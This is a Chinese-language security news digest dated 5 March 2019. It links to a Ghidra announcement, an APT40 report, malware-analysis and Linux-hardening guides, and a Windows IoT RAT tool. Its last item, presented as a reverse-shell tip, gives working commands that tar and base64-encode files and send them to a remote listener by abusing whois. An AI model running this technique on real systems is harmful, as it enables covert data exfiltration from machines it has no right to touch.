2019年03月05日

【资讯】 NSA的开源逆向工具即将释出:https://ghidra-sre.org/

【资讯】 APT40分析报告:https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

【文章】 病毒分析虚拟机(Windows)搭建:https://zeltser.com/free-malware-analysis-windows-vm/

【工具】 Windows IOT core RAT: https://github.com/SafeBreach-Labs/SirepRAT/blob/master/README.md

【指南】 Linux使用强化指南:https://trimstray.github.io/the-practical-linux-hardening-guide/

【文章】 mousejack : https://www.jimwilbur.com/2019/01/mousejack-from-mouse-to-shell-part-1/

【文章】 检测父进程欺骗验证实验 :https://www.countercept.com/blog/detecting-parent-pid-spoofing/

【技巧】 反弹shell:

First:  ncat -k -l -p 4444 | tee files.b64  (tee to a file so you can make sure you have it)

Next: tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits

Finally: cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv (to get the files out)